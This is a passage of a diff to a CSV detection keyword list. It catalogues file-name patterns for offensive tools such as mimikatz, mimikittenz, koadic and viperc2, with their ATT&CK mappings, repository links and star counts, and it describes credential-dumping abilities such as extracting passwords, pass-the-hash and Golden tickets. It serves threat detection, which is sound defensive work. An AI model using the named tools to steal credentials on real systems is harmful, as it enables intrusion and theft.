Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.pdb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.sys*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimi32.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimi64.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.pdb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.sys*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*mimikatz -Command *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*mimikatz for Windows*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*Mimikatz*","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz for Windows*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Mimikatz*","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Mimikatz.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*mimikatz.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*mimikatz.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*mimikatz.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimikatz.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*mimikatz.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*mimikatz_cred_collector.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*mimikatz.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*mimikatz.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mimikatz.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*mimikatz_cred_collector.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*mimikatz_dotnet2js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_dynwrapx*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_tashlib*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*mimikatz_trunk*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz_trunk*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*mimikatz_x64.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*mimikatz_x86.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*MimikatzByPowerShellForDomain.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*MimikatzOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*mimikittenz*","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/orlyjamie/mimikittenz","1","1","N/A","10","10","1792","352","2020-10-16T01:20:30Z","2016-07-04T13:57:18Z" -"*mimilib (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib for Windows (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - 